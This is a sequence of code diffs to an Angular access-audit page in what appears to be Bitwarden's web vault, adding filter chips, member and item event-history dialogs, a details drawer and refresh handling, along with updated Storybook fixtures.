-    actorId: "user-2",
-    actorName: "Ada Lovelace",
+    ...APPROVER,
     detail: "Incident closed early.",
-  }),
-  event({
-    kind: AccessAuditEventKind.LeaseRevoked,
-    occurredAt: fromNow(-25 * MINUTE),
-    leaseId: "lease-3",
   }),
   event({
     kind: AccessAuditEventKind.LeaseExtended,
@@ -92,37 +111,51 @@ const EVENTS: AccessAuditEventResponse[] = [
   event({
     kind: AccessAuditEventKind.RequestApproved,
     occurredAt: fromNow(-3 * HOUR),
-    actorName: "Ada Lovelace",
-    actorEmail: "ada@example.com",
+    ...APPROVER,
     detail: "Approved for the incident window.",
   }),
   // No actor: the rule auto-approved it, which the row renders as an automated action.
   event({
     kind: AccessAuditEventKind.RequestApproved,
-    occurredAt: fromNow(-4 * HOUR),
+    occurredAt: fromNow(-2 * DAY),
     cipherId: "cipher-2",
     collectionId: "col-2",
+    requestId: "req-2",
+    ...OTHER_REQUESTER,
     actorId: null,
     actorName: null,
     actorEmail: null,
+    automated: true,
+  }),
+  event({
+    kind: AccessAuditEventKind.RequestSubmitted,
+    occurredAt: fromNow(-2 * DAY - HOUR),
+    cipherId: "cipher-2",
+    collectionId: "col-2",
+    requestId: "req-2",
+    ...OTHER_REQUESTER,
+    actorId: OTHER_REQUESTER.requesterId,
+    actorName: OTHER_REQUESTER.requesterName,
+    actorEmail: OTHER_REQUESTER.requesterEmail,
   }),
   event({
     kind: AccessAuditEventKind.RequestDenied,
-    occurredAt: fromNow(-DAY),
+    occurredAt: fromNow(-4 * DAY),
     cipherId: "cipher-3",
-    actorName: "Ada Lovelace",
+    ...APPROVER,
     detail: "Use the read replica instead.",
   }),
-  event({ kind: AccessAuditEventKind.RequestCancelled, occurredAt: fromNow(-2 * DAY) }),
+  event({ kind: AccessAuditEventKind.RequestCancelled, occurredAt: fromNow(-5 * DAY) }),
   // A rule change: no cipher, so the subject column falls back to the rule name.
   event({
     kind: AccessAuditEventKind.RuleUpdated,
-    occurredAt: fromNow(-3 * DAY),
+    occurredAt: fromNow(-7 * DAY),
     cipherId: null,
     collectionId: null,
     requestId: null,
     ruleId: "rule-1",
     ruleName: "Production access",
+    ...APPROVER,
   }),
 ];
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -2,7 +2,7 @@ import { importProvidersFrom } from "@angular/core";
 import { ActivatedRoute, RouterModule } from "@angular/router";
 import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/angular";
 import { of } from "rxjs";
-import { userEvent } from "storybook/test";
+import { fireEvent } from "storybook/test";
 
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
@@ -236,13 +236,14 @@ export const SingleEvent: Story = {
 };
 
 /**
- * A search that matches nothing. Export is disabled alongside the no-matches callout: the file follows the
- * filtered table, so with nothing on screen there is nothing to download.
+ * A filter that matches nothing — a From bound later than every event in the trail. Export is disabled
+ * alongside the no-matches callout: the file follows the filtered table, so with nothing on screen there is
+ * nothing to download.
  */
 export const NoMatches: Story = {
   decorators: [audit()],
   play: async ({ canvasElement }) => {
-    const search = canvasElement.querySelector<HTMLInputElement>('input[name="searchText"]')!;
-    await userEvent.type(search, "nothing matches this");
+    const from = canvasElement.querySelector<HTMLInputElement>("#access-audit_input_from")!;
+    await fireEvent.input(from, { target: { value: "2999-01-01T00:00" } });
   },
 };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -364,9 +364,9 @@ export class AccessAuditComponent implements OnInit {
   /**
    * The member behind one of a row's identities, when the trail carries a label to render for them and
    * {@link members} resolved them to someone whose event history can be opened. Null otherwise, and the
-   * cell then renders that label as plain text — which is also what every row shows to a viewer who
-   * cannot enumerate members. An identity that cannot be resolved is ordinary, so it must never be given
-   * an anchor: a dead link on an audit surface invites a click that reports nothing.
+   * cell then renders that label as plain text — a former member, or a row whose actor is the automated
+   * bucket. An identity that cannot be resolved is ordinary, so it must never be given an anchor: a dead
+   * link on an audit surface invites a click that reports nothing.
    */
   protected linkedMember(userId: string | null, label: string | null): ResolvedMember | null {
     if (userId == null || label == null) {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -58,6 +58,8 @@ import {
   AuditRow,
   AuditTimePeriod,
   UNBOUNDED_AUDIT_RANGE,
+  auditItemId,
+  auditItemLabel,
   auditPresetRange,
   auditRangeEnd,
   auditRangeStart,
@@ -83,6 +85,7 @@ const FILTER_KEYS = {
   kind: "kind",
   actor: "actor",
   requester: "requester",
+  item: "item",
   timePeriod: "timePeriod",
 } as const;
 
@@ -140,7 +143,7 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
  * permission that authorized this page — an actor, a requester or a cipher, never an access rule, which
  * has no such dialog.
  *
- * The toolbar filters (event kind, actor, requester, time period) run client-side over the already-fetched
+ * The toolbar filters (event kind, actor, requester, item, time period) run client-side over the already-fetched
  * window: the endpoint takes no query parameters and returns the whole 90 days at once, so changing a
  * filter never re-reads it. Update is therefore not "apply these filters" as it is on the organization
  * event log — those are already live — but the only way to pull in events recorded since the page opened.
@@ -235,12 +238,17 @@ export class AccessAuditComponent implements OnInit {
   private readonly kindChip = viewChild("kindFilter", { read: FILTER_CONTROL });
   private readonly actorChip = viewChild("actorFilter", { read: FILTER_CONTROL });
   private readonly requesterChip = viewChild("requesterFilter", { read: FILTER_CONTROL });
+  private readonly itemChip = viewChild("itemFilter", { read: FILTER_CONTROL });
   private readonly timePeriodChip = viewChild("timePeriodFilter", { read: FILTER_CONTROL });
 
   private readonly chips = computed(() =>
-    [this.kindChip(), this.actorChip(), this.requesterChip(), this.timePeriodChip()].filter(
-      (chip): chip is FilterControl => chip != null,
-    ),
+    [
+      this.kindChip(),
+      this.actorChip(),
+      this.requesterChip(),
+      this.itemChip(),
+      this.timePeriodChip(),
+    ].filter((chip): chip is FilterControl => chip != null),
   );
 
   /**
@@ -292,6 +300,23 @@ export class AccessAuditComponent implements OnInit {
     identityOptions(this.rows(), "requester").sort(byLabel),
   );
 
+  /**
+   * One option per item the trail names, labelled the way the Item cell labels it. Rows whose cell renders
+   * an em dash — no cipher this viewer could decrypt and no rule — contribute nothing, so the menu never
+   * offers an option that would narrow the table to rows showing no item.
+   */
+  protected readonly itemOptions = computed<AuditChipOption[]>(() => {
+    const items = new Map<string, string>();
+    for (const row of this.rows()) {
+      const value = auditItemId(row);
+      const label = auditItemLabel(row);
+      if (value != null && label != null && !items.has(value)) {
+        items.set(value, label);
+      }
+    }
+    return [...items].map(([value, label]) => ({ value, label })).sort(byLabel);
+  });
+
   /** A multi-select chip's selection, or null when it has none — which matches every row. */
   private selectedValues(chip: FilterControl | undefined): string[] | null {
     const value = chip?.value();
@@ -318,6 +343,7 @@ export class AccessAuditComponent implements OnInit {
       kindLabelKey: this.selectedValues(this.kindChip()),
       actorId: this.selectedValues(this.actorChip()),
       requesterId: this.selectedValues(this.requesterChip()),
+      itemId: this.selectedValues(this.itemChip()),
       from,
       to,
     };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -360,7 +360,11 @@ export class AccessAuditComponent implements OnInit {
       this.setPeriod(previous);
       return;
     }
-    this.customRange.set(result);
+    if (result.action === "clear") {
+      this.resetTimePeriod();
+      return;
+    }
+    this.customRange.set({ from: result.from, to: result.to });
     this.range.set({ from: auditRangeStart(result.from), to: auditRangeEnd(result.to) });
     this.appliedPeriod.set("custom");
   }
@@ -369,15 +373,21 @@ export class AccessAuditComponent implements OnInit {
     this.timePeriodChip()?.setValue(period);
   }
 
+  /** Drops the time period back to the whole fetched trail, chip and bounds together. */
+  private resetTimePeriod(): void {
+    this.customRange.set(NO_CUSTOM_RANGE);
+    this.handledPeriod.set(null);
+    this.appliedPeriod.set(null);
+    this.range.set(UNBOUNDED_AUDIT_RANGE);
+    this.setPeriod(null);
+  }
+
   /** Resets every chip, so an auditor who narrowed the trail four ways gets back to all of it in one click. */
   protected clearAll(): void {
     for (const chip of this.chips()) {
       chip.setValue(null);
     }
-    this.customRange.set(NO_CUSTOM_RANGE);
-    this.handledPeriod.set(null);
-    this.appliedPeriod.set(null);
-    this.range.set(UNBOUNDED_AUDIT_RANGE);
+    this.resetTimePeriod();
   }
 
   async ngOnInit(): Promise<void> {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -216,18 +216,21 @@ export class AccessAuditComponent implements OnInit {
 
   private readonly activeUserId$ = this.accountService.activeAccount$.pipe(getUserId);
 
+  /** The organization the trail belongs to, which is what every permission below is read off. */
+  private readonly organization = toSignal(
+    this.activeUserId$.pipe(
+      switchMap((userId) => this.organizationService.organizations$(userId)),
+      getById(this.organizationId()),
+    ),
+  );
+
   /**
    * Gates the empty state's "Access rules" link. This page's own guard, `canAccessEventLogs`, does
    * not imply `canManageAccessRules` (the target route's guard) — an auditor holding only the events
    * permission would follow the link into an "Access denied" bounce.
    */
-  protected readonly canManageAccessRules = toSignal(
-    this.activeUserId$.pipe(
-      switchMap((userId) => this.organizationService.organizations$(userId)),
-      getById(this.organizationId()),
-      map((organization) => organization?.canManageAccessRules ?? false),
-    ),
-    { initialValue: false },
+  protected readonly canManageAccessRules = computed(
+    () => this.organization()?.canManageAccessRules ?? false,
   );
 
   /**
@@ -236,13 +239,8 @@ export class AccessAuditComponent implements OnInit {
    * neither implied by this page's own `canAccessEventLogs`, so a custom auditor holding the events
    * permission alone would follow the link into an "Access denied" bounce.
    */
-  private readonly canViewCollections = toSignal(
-    this.activeUserId$.pipe(
-      switchMap((userId) => this.organizationService.organizations$(userId)),
-      getById(this.organizationId()),
-      map((organization) => organization?.canViewAllCollections ?? false),
-    ),
-    { initialValue: false },
+  private readonly canViewCollections = computed(
+    () => this.organization()?.canViewAllCollections ?? false,
   );
 
   protected readonly status = signal<AuditStatus>("loading");

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -14,6 +14,8 @@ import { FormControl, ReactiveFormsModule, ValidatorFn } from "@angular/forms";
 import { ActivatedRoute, RouterLink } from "@angular/router";
 import { map, switchMap } from "rxjs";
 
+import { OrganizationUserApiService } from "@bitwarden/admin-console/common";
+import { UserNamePipe } from "@bitwarden/angular/pipes/user-name.pipe";
 import { NoResults } from "@bitwarden/assets/svg";
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
@@ -29,6 +31,7 @@ import {
   CalloutModule,
   ChipFilterComponent,
   ChipFilterOption,
+  DialogService,
   FilterMenuComponent,
   FilterOptionComponent,
   FormFieldModule,
@@ -39,6 +42,11 @@ import {
   TooltipDirective,
 } from "@bitwarden/components";
 import { I18nPipe } from "@bitwarden/ui-common";
+import { openEntityEventsDialog } from "@bitwarden/web-vault/app/dirt/event-logs/components/entity-events/entity-events.component";
+import {
+  ResolvedMember,
+  isLinkableMember,
+} from "@bitwarden/web-vault/app/dirt/event-logs/components/send-access-member";
 import { HeaderModule } from "@bitwarden/web-vault/app/layouts/header/header.module";
 
 import { AccessNameResolverService } from "../access-requests/access-name-resolver.service";
@@ -104,12 +112,16 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
  * because those are Vault Data — encrypted EncStrings this client only decrypts for items already in
  * the viewer's own vault. An admin who never held the item sees no item name, by design.
  *
- * Read-only, and deliberately without a drill-down: the request-detail page is authorized for the
- * request's requester or a managing approver, which is a different permission from the one that opens
- * this trail, so an auditor holding only AccessEventLogs would follow such a link into a 404. The
- * toolbar filters (event kind, actor, requester, date range) run client-side over the
- * already-fetched window: the endpoint takes no query parameters and returns the whole 90 days at once,
- * so changing a filter never re-reads it.
+ * Read-only, and deliberately without a drill-down to another PAM page: the request-detail page is
+ * authorized for the request's requester or a managing approver, which is a different permission from
+ * the one that opens this trail, so an auditor holding only AccessEventLogs would follow such a link
+ * into a 404. What the cells do open is the shared entity-events dialog, over the same AccessEventLogs
+ * permission that authorized this page — an actor, a requester or a cipher, never an access rule, which
+ * has no such dialog.
+ *
+ * The toolbar filters (event kind, actor, requester, date range) run client-side over the already-fetched
+ * window: the endpoint takes no query parameters and returns the whole 90 days at once, so changing a
+ * filter never re-reads it.
  */
 @Component({
   selector: "app-pam-access-audit",
@@ -135,6 +147,7 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
     TooltipDirective,
     I18nPipe,
   ],
+  providers: [UserNamePipe],
 })
 export class AccessAuditComponent implements OnInit {
   protected readonly noResultsSvg = NoResults;
@@ -148,6 +161,9 @@ export class AccessAuditComponent implements OnInit {
   private readonly logService = inject(LogService);
   private readonly accountService = inject(AccountService);
   private readonly organizationService = inject(OrganizationService);
+  private readonly organizationUserApiService = inject(OrganizationUserApiService);
+  private readonly userNamePipe = inject(UserNamePipe);
+  private readonly dialogService = inject(DialogService);
 
   /**
    * The organization whose trail to show, from the route. `requireSync` holds because `params` emits
@@ -177,6 +193,12 @@ export class AccessAuditComponent implements OnInit {
   protected readonly status = signal<AuditStatus>("loading");
   protected readonly rows = signal<AuditRow[]>([]);
 
+  /**
+   * The organization's members, keyed by PLATFORM user id — the id an audit row carries. The entity-events
+   * dialog is keyed on the ORGANIZATION USER id instead, so an identity can only be linked once this map
+   * has bridged the two. Empty whenever {@link loadMembers} was refused.
+   */
+  private readonly members = signal(new Map<string, ResolvedMember>());
   protected readonly actorControl = new FormControl<string | null>(null);
   protected readonly requesterControl = new FormControl<string | null>(null);
   protected readonly fromControl = new FormControl("", { nonNullable: true });
@@ -283,7 +305,11 @@ export class AccessAuditComponent implements OnInit {
       const refs = events
         .filter((event) => event.cipherId != null && event.collectionId != null)
         .map((event) => ({ cipherId: event.cipherId!, collectionId: event.collectionId! }));
-      const names = await this.nameResolver.resolveNames(refs);
+      const [names, members] = await Promise.all([
+        this.nameResolver.resolveNames(refs),
+        this.loadMembers(),
+      ]);
+      this.members.set(members);
       const rows = events.map((event) =>
         toAuditRow(event, names.cipherNameById, names.collectionNameById),
       );
@@ -293,6 +319,91 @@ export class AccessAuditComponent implements OnInit {
       this.logService.error(e);
       this.status.set("error");
     }
+  }
+
+  /**
+   * The organization's members, keyed by platform user id, for {@link members}.
+   *
+   * A refusal here is an ordinary outcome, not an error to surface: this page is authorized by
+   * AccessEventLogs alone, which does not imply permission to enumerate the organization's members. The
+   * lookup therefore resolves to an empty map rather than rejecting, leaving every identity unlinked and
+   * the trail itself intact — an auditor who cannot enumerate members still reads the whole trail.
+   */
+  private async loadMembers(): Promise<Map<string, ResolvedMember>> {
+    const members = new Map<string, ResolvedMember>();
+    try {
+      const response = await this.organizationUserApiService.getAllMiniUserDetails(
+        this.organizationId(),
+      );
+      for (const user of response.data) {
+        members.set(user.userId, {
+          name: this.userNamePipe.transform(user),
+          email: user.email,
+          organizationUserId: user.id,
+        });
+      }
+    } catch (e) {
+      this.logService.error(e);
+    }
+    return members;
+  }
+
+  /**
+   * The member behind one of a row's identities, when the trail carries a label to render for them and
+   * {@link members} resolved them to someone whose event history can be opened. Null otherwise, and the
+   * cell then renders that label as plain text — which is also what every row shows to a viewer who
+   * cannot enumerate members. An identity that cannot be resolved is ordinary, so it must never be given
+   * an anchor: a dead link on an audit surface invites a click that reports nothing.
+   */
+  protected linkedMember(userId: string | null, label: string | null): ResolvedMember | null {
+    if (userId == null || label == null) {
+      return null;
+    }
+    const members = this.members();
+    return isLinkableMember(userId, members) ? (members.get(userId) ?? null) : null;
+  }
+
+  /**
+   * Opens a member's own event history over this organization.
+   *
+   * Unlike the organization event log's equivalent, this deliberately does not route on to the members
+   * page afterwards: an auditor mid-table expects to keep their place, and that page is behind
+   * `manageUsers`, which this page's viewer need not hold.
+   */
+  protected openMemberEvents(event: Event, member: ResolvedMember): void {
+    event.preventDefault();
+    if (member.organizationUserId == null) {
+      return;
+    }
+    openEntityEventsDialog(this.dialogService, {
+      data: {
+        entity: "user",
+        entityId: member.organizationUserId,
+        organizationId: this.organizationId(),
+        name: member.name,
+        showUser: true,
+      },
+    });
+  }
+
+  /**
+   * Opens the subject item's own event history. Reachable only from a row whose item decrypted, which is
+   * to say one the viewer already holds.
+   */
+  protected openCipherEvents(event: Event, row: AuditRow): void {
+    event.preventDefault();
+    if (row.cipherId == null || row.cipherName == null) {
+      return;
+    }
+    openEntityEventsDialog(this.dialogService, {
+      data: {
+        entity: "cipher",
+        entityId: row.cipherId,
+        organizationId: this.organizationId(),
+        name: row.cipherName,
+        showUser: true,
+      },
+    });
   }
 
   /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -67,6 +67,7 @@ import {
   toAuditRow,
 } from "./access-audit-row";
 import { AuditApiService } from "./audit-api.service";
+import { AuditEventDrawerComponent } from "./audit-event-drawer/audit-event-drawer.component";
 import { AuditExportService } from "./audit-export.service";
 import {
   CustomRangeDialogComponent,
@@ -153,7 +154,8 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
  * the one that opens this trail, so an auditor holding only AccessEventLogs would follow such a link
  * into a 404. What the cells do open is the shared entity-events dialog, over the same AccessEventLogs
  * permission that authorized this page — an actor, a requester or a cipher, never an access rule, which
- * has no such dialog.
+ * has no such dialog. The row itself opens {@link AuditEventDrawerComponent} over the same trail this
+ * page already holds, which is where the fields too wide for a column live.
  *
  * The toolbar filters (event kind, actor, requester, item, time period) run client-side over the already-fetched
  * window: the endpoint takes no query parameters and returns the whole 90 days at once, so changing a
@@ -543,6 +545,7 @@ export class AccessAuditComponent implements OnInit {
    */
   protected openMemberEvents(event: Event, member: ResolvedMember): void {
     event.preventDefault();
+    event.stopPropagation();
     if (member.organizationUserId == null) {
       return;
     }
@@ -563,6 +566,7 @@ export class AccessAuditComponent implements OnInit {
    */
   protected openCipherEvents(event: Event, row: AuditRow): void {
     event.preventDefault();
+    event.stopPropagation();
     if (row.cipherId == null || row.cipherName == null) {
       return;
     }
@@ -573,6 +577,25 @@ export class AccessAuditComponent implements OnInit {
         organizationId: this.organizationId(),
         name: row.cipherName,
         showUser: true,
+      },
+    });
+  }
+
+  /**
+   * Opens one event's details in the side drawer.
+   *
+   * The identities are resolved here rather than in the drawer so the pane links exactly what the row
+   * under it links — the member lookup ran once for the whole trail, and a second answer could
+   * disagree with the first. An automated row has no actor to resolve: its cell reads "System",
+   * which is a value, not a member.
+   */
+  protected openDetails(row: AuditRow): void {
+    void AuditEventDrawerComponent.open(this.dialogService, {
+      data: {
+        row,
+        organizationId: this.organizationId(),
+        actor: row.automated ? null : this.linkedMember(row.actorId, row.actor),
+        requester: this.linkedMember(row.requesterId, row.requester),
       },
     });
   }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -121,7 +121,8 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
  *
  * The toolbar filters (event kind, actor, requester, date range) run client-side over the already-fetched
  * window: the endpoint takes no query parameters and returns the whole 90 days at once, so changing a
- * filter never re-reads it.
+ * filter never re-reads it. Update is therefore not "apply these filters" as it is on the organization
+ * event log — those are already live — but the only way to pull in events recorded since the page opened.
  */
 @Component({
   selector: "app-pam-access-audit",
@@ -297,8 +298,22 @@ export class AccessAuditComponent implements OnInit {
     await this.load();
   }
 
-  protected async load(): Promise<void> {
-    this.status.set("loading");
+  /**
+   * Reads the trail and rebuilds everything derived from it. An arrow property so `bitAction` can call it
+   * detached from the instance, and safe to call on an already-rendered page: the Update button re-runs it
+   * so events recorded since the page opened appear.
+   *
+   * A refresh deliberately leaves the rendered table in place until it has something to replace it with.
+   * Dropping back to "loading" would take the whole ready branch — the toolbar, the filters and the very
+   * button being pressed — out of the DOM mid-refresh, and a failed refresh that swapped a readable trail
+   * for an error callout would lose the auditor their place over a transient error. The failure is raised
+   * to `bitAction` instead, which reports it while the table stays as it was.
+   */
+  protected readonly load = async (): Promise<void> => {
+    const refreshing = this.status() === "ready";
+    if (!refreshing) {
+      this.status.set("loading");
+    }
     try {
       const events = await this.auditApiService.listAccessAuditTrail(this.organizationId());
       // Only events naming both a cipher and its collection can be resolved to a local vault item.
@@ -316,10 +331,13 @@ export class AccessAuditComponent implements OnInit {
       this.rows.set(rows);
       this.status.set(rows.length === 0 ? "empty" : "ready");
     } catch (e) {
+      if (refreshing) {
+        throw e;
+      }
       this.logService.error(e);
       this.status.set("error");
     }
-  }
+  };
 
   /**
    * The organization's members, keyed by platform user id, for {@link members}.

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -227,7 +227,7 @@ export class AccessAuditComponent implements OnInit {
 
   /**
    * The filter chips, which own their own selections. Read through the {@link FilterControl} contract
-   * rather than a host bridge: this page is not a filterable surface with rows to facet, it is four
+   * rather than a host bridge: this page is not a filterable surface with rows to facet, it is a few
    * independent chips over one already-fetched array.
    *
    * Located by template reference rather than by matching `key()`, and only `value`, `active` and

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -292,7 +292,17 @@ export class AccessAuditComponent implements OnInit {
     identityOptions(this.rows(), "requester").sort(byLabel),
   );
 
-  /** One chip's selection, or null when that chip has none. Single-select, so the value is a scalar. */
+  /** A multi-select chip's selection, or null when it has none — which matches every row. */
+  private selectedValues(chip: FilterControl | undefined): string[] | null {
+    const value = chip?.value();
+    if (!Array.isArray(value)) {
+      return null;
+    }
+    const selected = value.filter((entry): entry is string => typeof entry === "string");
+    return selected.length > 0 ? selected : null;
+  }
+
+  /** The single-select time-period chip's selection, whose value is a scalar rather than a list. */
   private selectedValue(chip: FilterControl | undefined): string | null {
     const value = chip?.value();
     return typeof value === "string" ? value : null;
@@ -305,9 +315,9 @@ export class AccessAuditComponent implements OnInit {
   protected readonly filteredRows = computed(() => {
     const { from, to } = this.range();
     const filter: AuditFilter = {
-      kindLabelKey: this.selectedValue(this.kindChip()),
-      actorId: this.selectedValue(this.actorChip()),
-      requesterId: this.selectedValue(this.requesterChip()),
+      kindLabelKey: this.selectedValues(this.kindChip()),
+      actorId: this.selectedValues(this.actorChip()),
+      requesterId: this.selectedValues(this.requesterChip()),
       from,
       to,
     };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -278,6 +278,13 @@ export class AccessAuditComponent implements OnInit {
 
   protected readonly customPeriodLabel = this.i18nService.t(AUDIT_TIME_PERIOD_LABEL_KEYS.custom);
 
+  /**
+   * Whether a custom range is the period in force. The chip cannot reopen its own dialog — re-selecting
+   * "Custom" writes the value it already holds, so the selection signal never notifies — so editing the
+   * bounds is a separate affordance rather than a second trip through the menu.
+   */
+  protected readonly customRangeApplied = computed(() => this.appliedPeriod() === "custom");
+
   protected readonly kindOptions = computed<AuditChipOption[]>(() =>
     [...new Set(this.rows().map((row) => row.kindLabelKey))]
       .map((labelKey) => ({ label: this.i18nService.t(labelKey), value: labelKey }))
@@ -404,6 +411,11 @@ export class AccessAuditComponent implements OnInit {
     this.range.set({ from: auditRangeStart(result.from), to: auditRangeEnd(result.to) });
     this.appliedPeriod.set("custom");
   }
+
+  /** Reopens the range dialog on the bounds in force, which the chip itself cannot do. */
+  protected readonly editCustomRange = async (): Promise<void> => {
+    await this.openCustomRange();
+  };
 
   private setPeriod(period: AuditTimePeriod | null): void {
     this.timePeriodChip()?.setValue(period);

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -24,8 +24,11 @@ import {
   BadgeModule,
   ButtonModule,
   CalloutModule,
+  ChipFilterComponent,
+  ChipFilterOption,
   FilterMenuComponent,
   FilterOptionComponent,
+  FormFieldModule,
   LinkModule,
   StatusLockupComponent,
   SvgComponent,
@@ -38,10 +41,37 @@ import { HeaderModule } from "@bitwarden/web-vault/app/layouts/header/header.mod
 
 import { AccessNameResolverService } from "../access-requests/access-name-resolver.service";
 
-import { AuditRow, auditRowMatchesFilter, toAuditRow } from "./access-audit-row";
+import {
+  AUTOMATED_ACTOR,
+  AuditRow,
+  auditRangeEnd,
+  auditRangeStart,
+  auditRowMatchesFilter,
+  toAuditRow,
+} from "./access-audit-row";
 import { AuditApiService } from "./audit-api.service";
 
 type AuditStatus = "loading" | "ready" | "empty" | "error";
+
+/**
+ * One chip option per distinct identity in `rows`, labelled the way the cells label it. A row whose identity
+ * resolved to neither a name nor an email is skipped rather than offered under its raw id.
+ */
+function identityOptions(
+  rows: AuditRow[],
+  id: (row: AuditRow) => string | null,
+  label: (row: AuditRow) => string | null,
+): ChipFilterOption<string>[] {
+  const labelById = new Map<string, string>();
+  for (const row of rows) {
+    const value = id(row);
+    const text = label(row);
+    if (value != null && text != null && !labelById.has(value)) {
+      labelById.set(value, text);
+    }
+  }
+  return [...labelById].map(([value, text]) => ({ label: text, value }));
+}
 
 /**
  * The organization's PAM access-audit trail, read from the dedicated append-only audit store.
@@ -57,7 +87,9 @@ type AuditStatus = "loading" | "ready" | "empty" | "error";
  * Read-only, and deliberately without a drill-down: the request-detail page is authorized for the
  * request's requester or a managing approver, which is a different permission from the one that opens
  * this trail, so an auditor holding only AccessEventLogs would follow such a link into a 404. The
- * toolbar filters (free-text + event kind) run client-side over the already-fetched window.
+ * toolbar filters (free text, event kind, actor, requester, date range) run client-side over the
+ * already-fetched window: the endpoint takes no query parameters and returns the whole 90 days at once,
+ * so changing a filter never re-reads it.
  */
 @Component({
   selector: "app-pam-access-audit",
@@ -70,8 +102,10 @@ type AuditStatus = "loading" | "ready" | "empty" | "error";
     BadgeModule,
     ButtonModule,
     CalloutModule,
+    ChipFilterComponent,
     FilterMenuComponent,
     FilterOptionComponent,
+    FormFieldModule,
     HeaderModule,
     LinkModule,
     StatusLockupComponent,
@@ -123,6 +157,10 @@ export class AccessAuditComponent implements OnInit {
 
   // --- Toolbar filters (client-side over the fetched window) ---
   protected readonly searchControl = new FormControl("", { nonNullable: true });
+  protected readonly actorControl = new FormControl<string | null>(null);
+  protected readonly requesterControl = new FormControl<string | null>(null);
+  protected readonly fromControl = new FormControl("", { nonNullable: true });
+  protected readonly toControl = new FormControl("", { nonNullable: true });
 
   private readonly searchText = toSignal(this.searchControl.valueChanges, { initialValue: "" });
 
@@ -135,6 +173,29 @@ export class AccessAuditComponent implements OnInit {
 
   private readonly kindValue = computed(() => (this.kindMenu()?.value() ?? null) as string | null);
 
+  private readonly actorValue = toSignal(this.actorControl.valueChanges, { initialValue: null });
+  private readonly requesterValue = toSignal(this.requesterControl.valueChanges, {
+    initialValue: null,
+  });
+  private readonly fromValue = toSignal(this.fromControl.valueChanges, { initialValue: "" });
+  private readonly toValue = toSignal(this.toControl.valueChanges, { initialValue: "" });
+
+  private readonly rangeStart = computed(() => auditRangeStart(this.fromValue()));
+  private readonly rangeEnd = computed(() => auditRangeEnd(this.toValue()));
+
+  /** From after To. Surfaced to the auditor, who otherwise reads an empty table as a trail with no events. */
+  protected readonly invertedRange = computed(() => {
+    const start = this.rangeStart();
+    const end = this.rangeEnd();
+    return start != null && end != null && end.getTime() < start.getTime();
+  });
+
+  /** `bit-error` renders the second element's `message` for any key it does not itself translate. */
+  protected readonly invalidRangeError: [string, { message: string }] = [
+    "invalidDateRange",
+    { message: this.i18nService.t("invalidDateRange") },
+  ];
+
   /** Event-kind chip options, limited to the labels actually present in the trail, sorted. */
   protected readonly kindOptions = computed(() =>
     [...new Set(this.rows().map((row) => row.kindLabelKey))]
@@ -142,11 +203,42 @@ export class AccessAuditComponent implements OnInit {
       .sort((a, b) => a.label.localeCompare(b.label)),
   );
 
-  protected readonly filteredRows = computed(() =>
-    this.rows().filter((row) =>
-      auditRowMatchesFilter(row, { text: this.searchText(), kindLabelKey: this.kindValue() }),
-    ),
+  /** Actor chip options: the identities that actually acted, plus the system bucket when the trail has one. */
+  protected readonly actorOptions = computed<ChipFilterOption<string>[]>(() => {
+    const rows = this.rows();
+    const options = identityOptions(
+      rows.filter((row) => !row.automated),
+      (row) => row.actorId,
+      (row) => row.actor,
+    );
+    if (rows.some((row) => row.automated)) {
+      options.push({ label: this.i18nService.t("pamAuditSystem"), value: AUTOMATED_ACTOR });
+    }
+    return options.sort((a, b) => a.label.localeCompare(b.label));
+  });
+
+  /** Requester chip options: the identities whose access the trail records. */
+  protected readonly requesterOptions = computed<ChipFilterOption<string>[]>(() =>
+    identityOptions(
+      this.rows(),
+      (row) => row.requesterId,
+      (row) => row.requester,
+    ).sort((a, b) => a.label.localeCompare(b.label)),
   );
+
+  protected readonly filteredRows = computed(() => {
+    const inverted = this.invertedRange();
+    return this.rows().filter((row) =>
+      auditRowMatchesFilter(row, {
+        text: this.searchText(),
+        kindLabelKey: this.kindValue(),
+        actorId: this.actorValue(),
+        requesterId: this.requesterValue(),
